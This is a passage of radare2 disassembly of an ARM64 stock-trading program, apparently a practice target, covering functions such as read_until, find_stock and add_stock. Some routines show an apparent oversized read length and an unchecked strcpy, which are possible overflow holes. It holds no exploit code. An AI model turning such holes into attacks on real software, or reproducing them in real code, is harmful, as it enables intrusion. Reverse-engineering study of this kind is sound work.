│╎│ 0x00001a18 01602091 add x1, x0, 0x818 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a1c e00780b9 ldrsw x0, [format] │ │╎│ 0x00001a20 00e47ad3 lsl x0, x0, 6 │ │╎│ 0x00001a24 2000008b add x0, x1, x0 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a28 033840b9 ldr w3, [x0, 0x38] │ │╎│ 0x00001a2c 800000b0 adrp x0, 0x12000 │ │╎│ 0x00001a30 01602091 add x1, x0, 0x818 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ ; DATA XREF from str.Quantity: @ +0x4(r) │ │╎│ 0x00001a34 e00780b9 ldrsw x0, [format] │ │╎│ 0x00001a38 00e47ad3 lsl x0, x0, 6 │ │╎│ 0x00001a3c 2000008b add x0, x1, x0 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a40 001840fd ldr d0, [x0, 0x30] │ │╎│ 0x00001a44 e10740b9 ldr w1, [format] │ │╎│ 0x00001a48 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │╎│ 0x00001a4c 00400091 add x0, x0, 0x10 ; 0x2010 ; "\t%d. %s: %d shares at $%.2f\n" ; const char *format │ │╎│ 0x00001a50 14fcff97 bl sym.imp.printf ; int printf(const char *format) │ │╎│ ; CODE XREF from sym.consult_market @ 0x19fc(x) │ └───> 0x00001a54 e00740b9 ldr w0, [format] │ ╎│ 0x00001a58 00040011 add w0, w0, 1 │ ╎│ 0x00001a5c e00700b9 str w0, [format] │ ╎│ ; CODE XREF from sym.consult_market @ 0x19dc(x) │ ╎└─> 0x00001a60 e00740b9 ldr w0, [format] │ ╎ 0x00001a64 1f8c0171 cmp w0, 0x63 ; 'c' │ └──< 0x00001a68 cdfbff54 b.le 0x19e0 │ 0x00001a6c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ 0x00001a70 00c00091 add x0, x0, 0x30 ; const char *s │ 0x00001a74 f7fbff97 bl sym.imp.puts ; int puts(const char *s) │ 0x00001a78 1f2003d5 nop │ 0x00001a7c 800000b0 adrp x0, 0x12000 │ 0x00001a80 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001a84 e20740f9 ldr x2, [var_8h] │ 0x00001a88 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001a8c 420001eb subs x2, x2, x1 │ 0x00001a90 010080d2 mov x1, 0 │ ┌─< 0x00001a94 40000054 b.eq 0x1a9c │ │ 0x00001a98 defbff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.consult_market @ 0x1a94(x) │ └─> 0x00001a9c fd7b41a9 ldp x29, x30, [var_10h] │ 0x00001aa0 ff830091 add sp, sp, 0x20 ; 0x178000 └ 0x00001aa4 c0035fd6 ret ; CALL XREF from sym.read_int @ 0xcf4(x) ; CALL XREF from sym.get_symbol_quantity @ 0xd70(x) ; CALL XREF from sym.check_stock_price @ 0x17e8(x) ┌ 248: sym.read_until (int64_t arg1, int64_t arg2, int64_t arg_40h); │ `- args(x0, x1) vars(7:sp[0x8..0x40]) │ 0x00000bd4 ff0301d1 sub sp, sp, 0x40 │ 0x00000bd8 fd7b03a9 stp x29, x30, [var_30h] │ 0x00000bdc fdc30091 add x29, sp, 0x30 │ 0x00000be0 e00700f9 str x0, [var_8h] ; arg1 │ 0x00000be4 e10300f9 str x1, [sp] ; arg2 │ 0x00000be8 800000d0 adrp x0, 0x12000 │ 0x00000bec 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000bf0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000bf4 e11700f9 str x1, [var_28h] │ 0x00000bf8 010080d2 mov x1, 0 │ 0x00000bfc ff1300f9 str xzr, [var_20h] │ 0x00000c00 ff1300f9 str xzr, [var_20h] │ ┌─< 0x00000c04 1b000014 b 0xc70 │ │ ; CODE XREF from sym.read_until @ 0xc80(x) │ ┌──> 0x00000c08 ff7f0039 strb wzr, [fildes] │ ╎│ 0x00000c0c e07f0091 add x0, sp, 0x1f ; int fildes │ ╎│ 0x00000c10 220080d2 mov x2, 1 ; size_t nbyte │ ╎│ 0x00000c14 e10300aa mov x1, x0 ; void *buf │ ╎│ 0x00000c18 00008052 mov w0, 0 │ ╎│ 0x00000c1c 99ffff97 bl sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte) │ ╎│ 0x00000c20 e07f4039 ldrb w0, [fildes] │ ╎│ 0x00000c24 1f340071 cmp w0, 0xd │ ┌───< 0x00000c28 80000054 b.eq 0xc38 │ │╎│ 0x00000c2c e07f4039 ldrb w0, [fildes] │ │╎│ 0x00000c30 1f280071 cmp w0, 0xa │ ┌────< 0x00000c34 e1000054 b.ne 0xc50 │ ││╎│ ; CODE XREF from sym.read_until @ 0xc28(x) │ │└───> 0x00000c38 e10740f9 ldr x1, [var_8h] │ │ ╎│ 0x00000c3c e01340f9 ldr x0, [var_20h] │ │ ╎│ 0x00000c40 2000008b add x0, x1, x0 │ │ ╎│ 0x00000c44 e17f4039 ldrb w1, [fildes] │ │ ╎│ 0x00000c48 01000039 strb w1, [x0] │ │┌───< 0x00000c4c 0e000014 b 0xc84 │ ││╎│ ; CODE XREF from sym.read_until @ 0xc34(x) │ └────> 0x00000c50 e10740f9 ldr x1, [var_8h] │ │╎│ 0x00000c54 e01340f9 ldr x0, [var_20h] │ │╎│ 0x00000c58 2000008b add x0, x1, x0 │ │╎│ 0x00000c5c e17f4039 ldrb w1, [fildes] │ │╎│ 0x00000c60 01000039 strb w1, [x0] │ │╎│ 0x00000c64 e01340f9 ldr x0, [var_20h] │ │╎│ 0x00000c68 00040091 add x0, x0, 1 │ │╎│ 0x00000c6c e01300f9 str x0, [var_20h] │ │╎│ ; CODE XREF from sym.read_until @ 0xc04(x) │ │╎└─> 0x00000c70 e00340f9 ldr x0, [sp] │ │╎ 0x00000c74 000400d1 sub x0, x0, 1 │ │╎ 0x00000c78 e11340f9 ldr x1, [var_20h] │ │╎ 0x00000c7c 3f0000eb cmp x1, x0 │ │└──< 0x00000c80 43fcff54 b.lo 0xc08 │ │ ; CODE XREF from sym.read_until @ 0xc4c(x) │ └───> 0x00000c84 e10740f9 ldr x1, [var_8h] │ 0x00000c88 e01340f9 ldr x0, [var_20h] │ 0x00000c8c 2000008b add x0, x1, x0 │ 0x00000c90 1f000039 strb wzr, [x0] │ 0x00000c94 e01340f9 ldr x0, [var_20h] │ 0x00000c98 e103002a mov w1, w0 │ 0x00000c9c 800000d0 adrp x0, 0x12000 │ 0x00000ca0 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ca4 e31740f9 ldr x3, [var_28h] │ 0x00000ca8 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000cac 630002eb subs x3, x3, x2 │ 0x00000cb0 020080d2 mov x2, 0 │ ┌─< 0x00000cb4 40000054 b.eq 0xcbc │ │ 0x00000cb8 56ffff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.read_until @ 0xcb4(x) │ └─> 0x00000cbc e003012a mov w0, w1 │ 0x00000cc0 fd7b43a9 ldp x29, x30, [var_30h] │ 0x00000cc4 ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x00000cc8 c0035fd6 ret ; CALL XREF from main @ 0x1db8(x) ┌ 232: sym.check_stock_price (int64_t arg_60h); │ `- args() vars(11:sp[0x8..0x54]) │ 0x000017a8 ff8301d1 sub sp, sp, 0x60 │ 0x000017ac fd7b05a9 stp x29, x30, [var_50h] │ 0x000017b0 fd430191 add x29, sp, 0x50 │ 0x000017b4 800000b0 adrp x0, 0x12000 │ 0x000017b8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000017bc 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000017c0 e12700f9 str x1, [var_48h] │ 0x000017c4 010080d2 mov x1, 0 │ 0x000017c8 ffff01a9 stp xzr, xzr, [format] │ 0x000017cc ffff02a9 stp xzr, xzr, [var_28h] │ 0x000017d0 ffff03a9 stp xzr, xzr, [var_38h] │ 0x000017d4 00000090 adrp x0, 0x1000 │ 0x000017d8 00803a91 add x0, x0, 0xea0 ; 0x1ea0 ; "Symbol:" ; const char *format │ 0x000017dc b1fcff97 bl sym.imp.printf ; int printf(const char *format) │ 0x000017e0 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000017e4 010680d2 mov x1, 0x30 ; '0' ; int64_t arg2 │ 0x000017e8 fbfcff97 bl sym.read_until │ 0x000017ec ff0b00f9 str xzr, [var_10h] │ 0x000017f0 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000017f4 eefdff97 bl sym.find_stock │ 0x000017f8 e00f00b9 str w0, [var_ch] │ 0x000017fc e00f40b9 ldr w0, [var_ch] │ 0x00001800 1f040031 cmn w0, 1 │ ┌─< 0x00001804 e0020054 b.eq 0x1860 │ │ 0x00001808 800000b0 adrp x0, 0x12000 │ │ 0x0000180c 01602091 add x1, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00001810 e00f80b9 ldrsw x0, [var_ch] │ │ 0x00001814 00e47ad3 lsl x0, x0, 6 │ │ 0x00001818 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x0000181c 001840fd ldr d0, [x0, 0x30] │ │ 0x00001820 e00b00fd str d0, [var_10h] │ │ 0x00001824 e10b40fd ldr d1, [var_10h] │ │ 0x00001828 00107e1e fmov d0, -1 │ │ 0x0000182c 2020601e fcmp d1, d0 │ ┌──< 0x00001830 a1000054 b.ne 0x1844 │ ││ 0x00001834 00000090 adrp x0, 0x1000 │ ││ 0x00001838 00603f91 add x0, x0, 0xfd8 ; 0x1fd8 ; "Stock not found." ; const char *s │ ││ 0x0000183c 85fcff97 bl sym.imp.puts ; int puts(const char *s) │ ┌───< 0x00001840 09000014 b 0x1864 │ │││ ; CODE XREF from sym.check_stock_price @ 0x1830(x) │ │└──> 0x00001844 e0630091 add x0, sp, 0x18 │ │ │ 0x00001848 e00b40fd ldr d0, [var_10h] │ │ │ 0x0000184c e10300aa mov x1, x0 │ │ │ 0x00001850 00000090 adrp x0, 0x1000 │ │ │ 0x00001854 00c03f91 add x0, x0, 0xff0 ; 0x1ff0 ; "%s: %.2f\n" ; const char *format │ │ │ 0x00001858 92fcff97 bl sym.imp.printf ; int printf(const char *format) │ │┌──< 0x0000185c 02000014 b 0x1864 │ │││ ; CODE XREF from sym.check_stock_price @ 0x1804(x) │ ││└─> 0x00001860 1f2003d5 nop │ ││ ; CODE XREFS from sym.check_stock_price @ 0x1840(x), 0x185c(x) │ └└──> 0x00001864 800000b0 adrp x0, 0x12000 │ 0x00001868 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000186c e22740f9 ldr x2, [var_48h] │ 0x00001870 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001874 420001eb subs x2, x2, x1 │ 0x00001878 010080d2 mov x1, 0 │ ┌─< 0x0000187c 40000054 b.eq 0x1884 │ │ 0x00001880 64fcff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.check_stock_price @ 0x187c(x) │ └─> 0x00001884 fd7b45a9 ldp x29, x30, [var_50h] │ 0x00001888 ff830191 add sp, sp, 0x60 ; 0x178000 └ 0x0000188c c0035fd6 ret INFO: Propagate noreturn information (aanr) ; CALL XREF from sym.get_symbol_quantity @ 0xd80(x) ; CALL XREFS from sym.short_sell @ 0x1674(x), 0x16e0(x) ; CALL XREF from main @ 0x1cf4(x) ┌ 104: sym.read_int (int64_t arg_a0h); │ `- args() vars(4:sp[0x8..0x98]) │ 0x00000ccc ff8302d1 sub sp, sp, 0xa0 │ 0x00000cd0 fd7b09a9 stp x29, x30, [var_90h] │ 0x00000cd4 fd430291 add x29, sp, 0x90 │ 0x00000cd8 800000d0 adrp x0, 0x12000 │ 0x00000cdc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ce0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ce4 e14700f9 str x1, [var_88h] │ 0x00000ce8 010080d2 mov x1, 0 │ 0x00000cec e0230091 add x0, sp, 8 ; int64_t arg1 │ 0x00000cf0 011080d2 mov x1, 0x80 ; int64_t arg2 │ 0x00000cf4 b8ffff97 bl sym.read_until │ 0x00000cf8 e0230091 add x0, sp, 8 ; const char *str │ 0x00000cfc 39ffff97 bl sym.imp.atoi ; int atoi(const char *str) │ 0x00000d00 e103002a mov w1, w0 │ 0x00000d04 800000d0 adrp x0, 0x12000 │ 0x00000d08 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d0c e34740f9 ldr x3, [var_88h] │ 0x00000d10 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d14 630002eb subs x3, x3, x2 │ 0x00000d18 020080d2 mov x2, 0 │ ┌─< 0x00000d1c 40000054 b.eq 0xd24 │ │ 0x00000d20 3cffff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.read_int @ 0xd1c(x) │ └─> 0x00000d24 e003012a mov w0, w1 │ 0x00000d28 fd7b49a9 ldp x29, x30, [var_90h] │ 0x00000d2c ff830291 add sp, sp, 0xa0 ; 0x178000 └ 0x00000d30 c0035fd6 ret INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from sym.buy_stock @ 0x11d0(x) ; CALL XREF from sym.sell_stock @ 0x13e4(x) ┌ 140: sym.get_symbol_quantity (int64_t arg1, int64_t arg2, int64_t arg_30h); │ `- args(x0, x1) vars(5:sp[0x8..0x30]) │ 0x00000d34 ffc300d1 sub sp, sp, 0x30 │ 0x00000d38 fd7b02a9 stp x29, x30, [var_20h] │ 0x00000d3c fd830091 add x29, sp, 0x20 │ 0x00000d40 e00700f9 str x0, [var_8h] ; arg1 │ 0x00000d44 e10300f9 str x1, [sp] ; arg2 │ 0x00000d48 800000d0 adrp x0, 0x12000 │ 0x00000d4c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d50 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d54 e10f00f9 str x1, [var_18h] │ 0x00000d58 010080d2 mov x1, 0 │ 0x00000d5c 000000b0 adrp x0, 0x1000 │ 0x00000d60 00803a91 add x0, x0, 0xea0 ; 0x1ea0 ; "Symbol:" ; const char *format │ 0x00000d64 4fffff97 bl sym.imp.printf ; int printf(const char *format) │ 0x00000d68 018080d2 mov x1, 0x400 ; int64_t arg2 │ 0x00000d6c e00740f9 ldr x0, [var_8h] ; int64_t arg1 │ 0x00000d70 99ffff97 bl sym.read_until │ 0x00000d74 000000b0 adrp x0, 0x1000 │ 0x00000d78 00c03a91 add x0, x0, 0xeb0 ; 0x1eb0 ; "Quantity:" ; const char *format │ 0x00000d7c 49ffff97 bl sym.imp.printf ; int printf(const char *format) │ 0x00000d80 d3ffff97 bl sym.read_int │ 0x00000d84 e103002a mov w1, w0 │ 0x00000d88 e00340f9 ldr x0, [sp] │ 0x00000d8c 010000b9 str w1, [x0] │ 0x00000d90 1f2003d5 nop │ 0x00000d94 800000d0 adrp x0, 0x12000 │ 0x00000d98 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d9c e20f40f9 ldr x2, [var_18h] │ 0x00000da0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000da4 420001eb subs x2, x2, x1 │ 0x00000da8 010080d2 mov x1, 0 │ ┌─< 0x00000dac 40000054 b.eq 0xdb4 │ │ 0x00000db0 18ffff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.get_symbol_quantity @ 0xdac(x) │ └─> 0x00000db4 fd7b42a9 ldp x29, x30, [var_20h] │ 0x00000db8 ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x00000dbc c0035fd6 ret ; CALL XREF from sym.buy_stock @ 0x11d8(x) ; CALL XREF from sym.sell_stock @ 0x1438(x) ; CALL XREF from sym.check_stock_price @ 0x17f4(x) ┌ 264: sym.find_stock (char *arg1, int64_t arg_40h); │ `- args(x0) vars(6:sp[0x10..0x38]) │ 0x00000fac ff0301d1 sub sp, sp, 0x40 │ ; DATA XREF from sym.short_sell @ 0x1728(r) │ 0x00000fb0 fd7b02a9 stp x29, x30, [var_20h] │ 0x00000fb4 fd830091 add x29, sp, 0x20 │ 0x00000fb8 f31b00f9 str x19, [var_30h] │ 0x00000fbc e00700f9 str x0, [s2] ; arg1 │ 0x00000fc0 800000d0 adrp x0, 0x12000 │ 0x00000fc4 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000fc8 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000fcc e10f00f9 str x1, [var_18h] │ 0x00000fd0 010080d2 mov x1, 0 │ 0x00000fd4 e00740f9 ldr x0, [s2] │ ; DATA XREF from sym.check_stock_price @ 0x1838(r) │ 0x00000fd8 00004039 ldrb w0, [x0] │ 0x00000fdc 1f000071 cmp w0, 0 │ ┌─< 0x00000fe0 61000054 b.ne 0xfec │ │ 0x00000fe4 00008012 mov w0, -1 │ ┌──< 0x00000fe8 25000014 b 0x107c │ ││ ; CODE XREF from sym.find_stock @ 0xfe0(x) │ │└─> 0x00000fec ff1700b9 str wzr, [var_14h] │ │ ; DATA XREF from sym.check_stock_price @ 0x1854(r) │ │┌─< 0x00000ff0 1c000014 b 0x1060 │ ││ ; CODE XREF from sym.find_stock @ 0x1074(x) │ ┌───> 0x00000ff4 800000d0 adrp x0, 0x12000 │ ╎││ 0x00000ff8 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x00000ffc e01780b9 ldrsw x0, [var_14h] │ ╎││ ; XREFS: DATA 0x00000d5c DATA 0x00000d74 DATA 0x00000e84 │ ╎││ ; XREFS: DATA 0x0000146c DATA 0x00001490 DATA 0x000015d4 │ ╎││ ; XREFS: DATA 0x00001644 DATA 0x00001668 DATA 0x00001688 │ ╎││ ; XREFS: DATA 0x0000169c DATA 0x000016cc DATA 0x00001724 │ ╎││ ; XREFS: DATA 0x000017d4 DATA 0x00001834 DATA 0x00001850 │ ╎││ 0x00001000 00e47ad3 lsl x0, x0, 6 │ ╎││ 0x00001004 2000008b add x0, x1, x0 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x00001008 00004039 ldrb w0, [x0] ; [0x12818:8]=0 │ ╎││ ; obj.stocks │ ╎││ 0x0000100c 1f000071 cmp w0, 0 │ ┌────< 0x00001010 00020054 b.eq 0x1050 │ │╎││ 0x00001014 e01780b9 ldrsw x0, [var_14h] │ │╎││ 0x00001018 01e47ad3 lsl x1, x0, 6 │ │╎││ 0x0000101c 800000b0 adrp x0, 0x12000 │ │╎││ 0x00001020 00602091 add x0, x0, 0x818 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001024 3300008b add x19, x1, x0 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001028 e00740f9 ldr x0, [s2] ; const char *s │ │╎││ 0x0000102c 59feff97 bl sym.imp.strlen ; size_t strlen(const char *s) │ │╎││ 0x00001030 e20300aa mov x2, x0 ; size_t n │ │╎││ 0x00001034 e10740f9 ldr x1, [s2] ; const void *s2 │ │╎││ 0x00001038 e00313aa mov x0, x19 ; const void *s1 │ │╎││ 0x0000103c 89feff97 bl sym.imp.memcmp ; int memcmp(const void *s1, const void *s2, size_t n) │ │╎││ 0x00001040 1f000071 cmp w0, 0 │ ┌─────< 0x00001044 81000054 b.ne 0x1054 │ ││╎││ 0x00001048 e01740b9 ldr w0, [var_14h] │ ┌──────< 0x0000104c 0c000014 b 0x107c │ │││╎││ ; CODE XREF from sym.find_stock @ 0x1010(x) │ ││└────> 0x00001050 1f2003d5 nop │ ││ ╎││ ; CODE XREF from sym.find_stock @ 0x1044(x) │ │└─────> 0x00001054 e01740b9 ldr w0, [var_14h] │ │ ╎││ 0x00001058 00040011 add w0, w0, 1 │ │ ╎││ 0x0000105c e01700b9 str w0, [var_14h] │ │ ╎││ ; CODE XREF from sym.find_stock @ 0xff0(x) │ │ ╎│└─> 0x00001060 e11740b9 ldr w1, [var_14h] │ │ ╎│ 0x00001064 a0000090 adrp x0, 0x15000 │ │ ╎│ 0x00001068 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x0000106c 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x00001070 3f00006b cmp w1, w0 │ │ └───< 0x00001074 03fcff54 b.lo 0xff4 │ │ │ 0x00001078 00008012 mov w0, -1 │ │ │ ; CODE XREFS from sym.find_stock @ 0xfe8(x), 0x104c(x) │ └───└──> 0x0000107c e103002a mov w1, w0 │ 0x00001080 800000b0 adrp x0, 0x12000 │ 0x00001084 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001088 e30f40f9 ldr x3, [var_18h] │ 0x0000108c 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001090 630002eb subs x3, x3, x2 │ 0x00001094 020080d2 mov x2, 0 │ ┌─< 0x00001098 40000054 b.eq 0x10a0 │ │ 0x0000109c 5dfeff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.find_stock @ 0x1098(x) │ └─> 0x000010a0 e003012a mov w0, w1 │ 0x000010a4 f31b40f9 ldr x19, [var_30h] │ 0x000010a8 fd7b42a9 ldp x29, x30, [var_20h] │ 0x000010ac ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x000010b0 c0035fd6 ret ; XREFS: CALL 0x00001b6c CALL 0x00001b78 CALL 0x00001b84 ; XREFS: CALL 0x00001b90 CALL 0x00001b9c CALL 0x00001ba8 ; XREFS: CALL 0x00001bb4 CALL 0x00001bc0 CALL 0x00001bcc ; XREFS: CALL 0x00001bd8 ┌ 360: sym.add_stock (char *arg1, int64_t arg_40h); │ `- args(x0) vars(6:sp[0x8..0x38]) │ 0x00000e44 ff0301d1 sub sp, sp, 0x40 │ 0x00000e48 fd7b03a9 stp x29, x30, [var_30h] │ 0x00000e4c fdc30091 add x29, sp, 0x30 │ 0x00000e50 e00700f9 str x0, [src] ; arg1 │ 0x00000e54 800000d0 adrp x0, 0x12000 │ 0x00000e58 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e5c 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e60 e11700f9 str x1, [var_28h] │ 0x00000e64 010080d2 mov x1, 0 │ 0x00000e68 ff1300f9 str xzr, [var_20h] │ 0x00000e6c ff1f00b9 str wzr, [var_1ch] │ 0x00000e70 a00000b0 adrp x0, 0x15000 │ 0x00000e74 00602891 add x0, x0, 0xa18 ; 0x15a18 │ ; obj.num_stocks │ 0x00000e78 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ ; obj.num_stocks │ ; CODE XREF from section..interp @ +0x10(x) │ 0x00000e7c 1f8c0171 cmp w0, 0x63 ; 'c' │ ┌─< 0x00000e80 a9000054 b.ls 0xe94 │ │ 0x00000e84 000000b0 adrp x0, 0x1000 │ │ 0x00000e88 00003b91 add x0, x0, 0xec0 ; 0x1ec0 ; "Cannot add any more stocks. Stock list is full." ; const char *s │ │ 0x00000e8c f1feff97 bl sym.imp.puts ; int puts(const char *s) │ ┌──< 0x00000e90 3c000014 b 0xf80 │ ││ ; CODE XREF from sym.add_stock @ 0xe80(x) │ │└─> 0x00000e94 0000c8d2 mov x0, 0x400000000000 │ │ 0x00000e98 e00fe8f2 movk x0, 0x407f, lsl 48 ; '\x7f@' │ │ 0x00000e9c 0100679e fmov d1, x0 │ │ ; DATA XREF from sym.get_symbol_quantity @ 0xd60(r) │ │ ; DATA XREF from sym.check_stock_price @ 0x17d8(r) │ │ 0x00000ea0 2009e8d2 mov x0, 0x4049000000000000 ; int64_t arg_30h │ │ 0x00000ea4 0000679e fmov d0, x0 │ │ 0x00000ea8 c6ffff97 bl sym.drand │ │ 0x00000eac e01300fd str d0, [var_20h] │ │ ; DATA XREF from sym.get_symbol_quantity @ 0xd78(r) │ │ ; DATA XREF from sym.short_sell @ 0x16a0(r) │ │ 0x00000eb0 d4feff97 bl sym.imp.rand ; int rand(void) │ │ 0x00000eb4 a1759152 mov w1, 0x8bad │ │ 0x00000eb8 611bad72 movk w1, 0x68db, lsl 16 │ │ 0x00000ebc 017c219b smull x1, w0, w1 │ │ ; DATA XREF from sym.add_stock @ 0xe88(r) │ │ 0x00000ec0 21fc60d3 lsr x1, x1, 0x20 │ │ 0x00000ec4 227c0c13 asr w2, w1, 0xc │ │ 0x00000ec8 017c1f13 asr w1, w0, 0x1f │ │ 0x00000ecc 4200014b sub w2, w2, w1 │ │ 0x00000ed0 01e28452 mov w1, 0x2710 ; '\x10\'' │ │ 0x00000ed4 417c011b mul w1, w2, w1 │ │ 0x00000ed8 0000014b sub w0, w0, w1 │ │ 0x00000edc e01f00b9 str w0, [var_1ch] │ │ 0x00000ee0 e01f40b9 ldr w0, [var_1ch] │ │ 0x00000ee4 00a00f11 add w0, w0, 0x3e8 │ │ 0x00000ee8 e01f00b9 str w0, [var_1ch] │ │ 0x00000eec a00000b0 adrp x0, 0x15000 │ │ ; DATA XREF from sym.sell_stock @ 0x1470(r) │ │ 0x00000ef0 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000ef4 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ 0x00000ef8 e003002a mov w0, w0 │ │ 0x00000efc 01e47ad3 lsl x1, x0, 6 │ │ 0x00000f00 800000d0 adrp x0, 0x12000 │ │ 0x00000f04 00602091 add x0, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ ; DATA XREF from sym.sell_stock @ 0x1494(r) │ │ 0x00000f08 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks ; char *dest │ │ 0x00000f0c e10740f9 ldr x1, [src] ; const char *src │ │ 0x00000f10 d8feff97 bl sym.imp.strcpy ; char *strcpy(char *dest, const char *src) │ │ 0x00000f14 a00000b0 adrp x0, 0x15000 │ │ 0x00000f18 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f1c 020040b9 ldr w2, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ ; DATA XREF from sym.short_sell @ 0x15d8(r) │ │ 0x00000f20 800000d0 adrp x0, 0x12000 │ │ 0x00000f24 01602091 add x1, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f28 e003022a mov w0, w2 │ │ 0x00000f2c 00e47ad3 lsl x0, x0, 6 │ │ 0x00000f30 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f34 e01340fd ldr d0, [var_20h] │ │ 0x00000f38 001800fd str d0, [x0, 0x30] │ │ 0x00000f3c a00000b0 adrp x0, 0x15000 │ │ 0x00000f40 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f44 030040b9 ldr w3, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ 0x00000f48 e11f40b9 ldr w1, [var_1ch] │ │ 0x00000f4c 800000d0 adrp x0, 0x12000 │ │ ; DATA XREF from sym.short_sell @ 0x1648(r) │ │ 0x00000f50 02602091 add x2, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f54 e003032a mov w0, w3 │ │ 0x00000f58 00e47ad3 lsl x0, x0, 6 │ │ 0x00000f5c 4000008b add x0, x2, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f60 013800b9 str w1, [x0, 0x38] │ │ 0x00000f64 a00000b0 adrp x0, 0x15000 │ │ ; DATA XREF from sym.short_sell @ 0x166c(r) │ │ 0x00000f68 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f6c 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ 0x00000f70 01040011 add w1, w0, 1 │ │ 0x00000f74 a00000b0 adrp x0, 0x15000 │ │ 0x00000f78 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f7c 010000b9 str w1, [x0] ; 0x15a18 │ │ ; obj.num_stocks │ │ ; CODE XREF from sym.add_stock @ 0xe90(x) │ │ ; 